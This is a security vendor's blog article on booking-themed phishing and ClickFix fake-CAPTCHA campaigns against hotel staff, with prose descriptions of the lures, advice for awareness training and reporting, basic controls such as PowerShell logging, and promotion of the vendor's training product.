Hotel Cybersecurity: A Practical Threat Playbook for Hospitality (2026)

Threat actors are targeting hotel staff with booking-related phishing emails and the ClickFix social engineering technique. These phishing campaigns are some of the most commonly observed examples of industry-specific targeting across the Hoxhunt network.

This article examines why hotels are targeted, how booking-related phishing campaigns operate, the operational and financial impact on hospitality, and what awareness teams can do to reduce human risk.

‍

Why are hotels prime targets for cyberattacks?

The accommodation industry handles a high volume of sensitive customer data, from payment card data to passport numbers and contact details. This makes breaches highly profitable for threat actors looking to extort the breached company, or sell data on cybercrime forums.

Operational disruptions impact both revenue and guest experience because guests depend on working check-in, room access, and payment systems, thereby increasing ransomware leverage. Time-sensitive scenarios such as cancellations and other last-minute changes, combined with reliance on third parties like booking platforms, create natural pretexts for social engineering.

‍

Observed phishing campaigns targeting hotels (OTA impersonation + ClickFix)

Attackers target the accommodation industry using multiple angles, impersonating both guests and online travel agencies (OTAs) such as Booking.com.

These campaigns have been observed across the Hoxhunt network in recent months and reflect active, ongoing targeting of hotel staff.

Campaign 1: Booking request pretext → ClickFix

The first example campaign begins with a booking request, often for a larger group such as a construction crew or a sports team. Larger groups might often coordinate bookings via email instead of through standard booking platforms, which makes the initial email seem more legitimate. These emails are usually sent from free email addresses, most often from gmail.com. The visible sender names are often different from the local-part (the part before @) of the gmail address: the sender name might show as “Name_1”, while the email is [Name_2]@gmail.com.

Apart from the sender-local-part mismatch, the individual initial contact requests are not overtly suspicious. However, the attackers are bulk-sending emails that tell the same story with some slight variation in details and wording, potentially suggesting AI-assisted drafting. While individually the emails might look benign, volume reveals a pattern.

If the recipient answers to the booking request, they receive a follow-up email. Threat actors claim they have seen negative reviews, related to, for example, extra fees or reported thefts, and share a malicious link that seems to lead to Booking.com (Figure 1).

In reality, the link leads to a malicious lookalike Booking.com site. The landing page first prompts the recipient to verify they’re human by completing a fake CAPTCHA, and claims the site needs to review the security of the recipient’s connection (Figure 2). Next, the user will be shown a series of commands they need to complete to “finish verification” (Figure 3). This is an example of the ClickFix technique, where threat actors' goal is to trick users into running malicious commands themselves.

Campaign 2: Booking.com impersonation → ClickFix

In the second campaign, attackers directly impersonate Booking.com, claiming the recipient needs to confirm hotel details to reactivate their account (Figure 4). If the first example relied more on regular workflows, this campaign leans on urgency and fear, as the email claims the recipient will lose access to their Booking.com account within 24 hours. The phishing email requests the recipient to complete a CAPTCHA verification, which suggests the landing page of the campaign may also use the ClickFix technique.

The common denominator: Booking.com and ClickFix

These campaigns show that as of early 2026, attackers are actively targeting the hotel industry with Booking.com lures and ClickFix. In January, researchers detailed how Booking.com impersonations and ClickFix are being used to deliver DCRat malware, which allows for persistent remote access, password theft and collection of other sensitive information.

ClickFix takes advantage of the recipient’s willingness to quickly resolve a problem themselves, especially under seeming time pressure. Many hotels rely on Booking.com for visibility and operations, meaning losing access to the account even momentarily could have a significant impact on business.

You can read our full phishing trends report here, covering the latest threats bypassing filters and what's working when it comes to training programs.

‍

What should hotel staff do when they receive an OTA or booking message? (training the default response)

This guidance only works if it’s trained as a default behavior, not delivered as one-time advice. In hotel environments (where staff are interrupted, under time pressure, and often new) the goal isn’t perfect judgment. It’s conditioning a repeatable response that holds up during peak check-in and high-stress moments.

The behavioral default to train (and retrain)

Awareness programs should reinforce a single, consistent response pattern until it becomes automatic:

• Don’t act inside the message: No links, no attachments, no “verification” steps, no copy-pasted commands.
• Verify via the known path: Open the OTA or booking platform using a saved bookmark or official domain and check there.
• Report immediately, even if unsure or after a click: Speed of reporting matters more than being right.

This should be taught the same way you would teach fire exits or cash-handling rules: simple, repetitive, and non-negotiable.

Booking- and OTA-themed attacks succeed because they exploit urgency and trusted workflows. Rather than expecting staff to analyze every message, awareness programs should focus on reinforcing a single, repeatable response for booking messages - one that holds up during peak check-in and high staff turnover.

How to reinforce this without slowing operations

To make this workable in hotel environments, reinforcement needs to be lightweight and continuous. Short reminders, realistic simulations, and consistent expectations across roles are more effective than infrequent, long-form training, especially for frontline teams..

What success looks like for security teams

When the default booking-message behavior is working, success shows up in faster reporting and higher visibility, not in zero clicks. Reporting trends and time-to-report provide a clearer picture of whether staff are escalating suspicious booking and OTA messages when it matters.

‍

How awareness teams operationalize this in hotel environments

Awareness teams don’t need to introduce new concepts for each campaign, they need to consistently reinforce the same booking-message behavior across onboarding, simulations, and reminders. In hotel environments, simplicity and consistency matter more than depth.

Make it part of onboarding (because risk resets with turnover)

High staff turnover means phishing risk resets frequently. The most effective programs bake booking-message handling into early onboarding, using realistic examples staff are likely to see on shift.

• Day 1: Introduce the default response for booking and OTA messages and show the approved reporting flow.
• First weeks: Reinforce the same pattern with one or two realistic booking-themed simulations (guest requests, account notices, refund pressure).
• First month: Repeat the scenario with small variations while keeping the response expectation identical.

The goal is familiarity, not mastery.

Use a short, continuous cadence (not episodic training)

Hotels benefit more from brief, regular reinforcement than from infrequent, long-form sessions. Short simulations and reminders tied to booking workflows keep expectations clear without pulling staff away from operations.

Consistency matters more than volume: the same response, reinforced over time, across roles and properties.

Support reporting as a normal operational action

Programs work best when reporting is treated as a routine operational step rather than an exception. Staff should know exactly how to escalate suspicious booking or OTA messages and feel confident doing so quickly, even when they are unsure.

For awareness teams, clarity and predictability here reduce hesitation and improve visibility during real campaigns.

What “good” looks like across properties

In multi-property or franchise environments, success comes from standardization:

• One clear response pattern for booking-related messages
• Role-relevant examples for front desk, reservations, and finance
• Regular review of reporting and response trends to spot gaps

This keeps expectations aligned across locations while allowing local teams to focus on guest service.

‍

How cyberattacks hit hotels (and where it hurts first)

After successfully infecting a computer with malware or gaining access to systems via credentials, the attackers can do significant harm to operations and confidential data. The consequences, whether financial, human or reputational, might be serious, as is evident from the following example.

In 2025, a casino hotel company paid $45 million to affected customers of a 2019 data breach and 2023 ransomware attack to settle multiple class action lawsuits. According to the company, the ransomware attack resulted in approximately $100 million in losses due to disrupted operations and other expenses like legal fees. These costs show how cyber incidents can compound over years through litigation, remediation and lost business.

During the incidents, sensitive customer data, like names, addresses, passport numbers and social security numbers was leaked. The exposure of this type of data has long-term risks for those affected, such as identity theft or further targeted phishing attempts. Following the ransomware attack, the company took some of its systems down and there were reports of slot machines, ATMs and room cards not working. This means the attack directly damaged customers' trust in the company’s ability to not only safeguard their data, but also ensure their safety on-site.

‍

Reducing hotel phishing risk: awareness behaviors and security controls

Awareness behaviors

• Ensure security awareness training for front desk staff covers booking platform impersonations, fake customer requests and ClickFix technique.
• Emphasize “pause-and-think” before clicking links. Rather than clicking, employees should be advised to navigate to booking platforms and other systems via official domains.
• Encourage end users to report real suspicious emails and other suspicious behavior through simple reporting flows and positive feedback. Employees should feel comfortable reporting even after a click or command execution.

Security controls

These controls limit damage but they don’t prevent initial compromise on their own - especially in booking-driven phishing attacks.

Ensure typosquatted and newly registered domains are quarantined or flagged, and quarantine emails with URLs that redirect multiple times.

Protect your systems from ClickFix:

• Reduce user ability to run commands or scripts.
• Review PowerShell execution policies to prevent abuse.
• Enable PowerShell Script Block Logging to detect malicious activity.

‍

Metrics that matter for hotel phishing risk (how awareness teams prove real impact)

Hotel awareness programs win when they can show measurable risk reduction without relying on vanity metrics like completion or click-rate alone. The most reliable signal is whether frontline staff report suspicious booking/OTA/vendor messages quickly and consistently. These four metrics translate directly into better detection, faster containment, and board-safe progress tracking.

The 4 metrics to track

‍

Hoxhunt for hotels: reducing booking-themed phishing risk without slowing front-desk operations

Hoxhunt helps hotels apply the guidance outlined above at scale by training realistic booking- and OTA-themed scenarios, making reporting easy for frontline teams, and giving security leaders clear visibility into reporting behavior and response speed.

Train the scenarios hotels actually face

Hoxhunt campaigns can mirror the real pretexts shown in this guide - booking inquiries, guest complaints, account reactivation pressure, and fake verification prompts - so training feels like the job, not generic security content. That matters in hospitality because relevance is what makes learning stick, especially for new hires and frontline roles.

Make reporting the “default action,” even after a mistake

Hotels don’t need perfection, they need speed and visibility. Hoxhunt’s approach reinforces reporting as the right behavior, including when someone clicked or followed steps, because fast escalation is what allows response teams to contain damage. Punitive programs suppress reporting; supportive programs increase it.

Reduce admin overhead for lean hotel security teams

Hotel security and IT teams are often stretched across multiple properties. Hoxhunt is designed to reduce “set up, chase, and babysit” work by running continuous training with less manual campaign management - so you can focus on trends, hotspots, and specific cohorts (front desk, reservations, finance) instead of endless scheduling.

Prove improvement with metrics leaders understand

Completion rates and click rates alone can be misleading. Hoxhunt emphasizes reporting- and speed-based measurement, so awareness managers can show progress in the outcomes that matter operationally:

• Reporting rate (are staff escalating suspicious booking/OTA messages?)
• Time-to-report (how quickly does the first report happen?)
• Miss rate (how often are suspicious messages ignored?)

Below you can see how Hoxhunt maximizes user engagement with personalized simulations at scale.

‍

Key takeaways for hotel security and awareness teams

• Hotel and hospitality staff are actively targeted with booking-themed phishing, including messages that impersonate guests and platforms like Booking.com.
• Many of these attacks use ClickFix-style lures, such as fake CAPTCHA or “verification” steps, to trick users into running malicious commands themselves.
• These campaigns work because they exploit real hotel workflows - high-volume, time-sensitive bookings and reliance on third-party platforms, not because staff are careless.
• Initial access can quickly escalate to stolen credentials, malware deployment, guest data exposure, operational disruption, and ransomware.
• Risk is reduced most effectively by focusing on people and process: training staff on booking/OTA impersonation patterns, reinforcing fast reporting, and supporting those behaviors with access and scripting controls.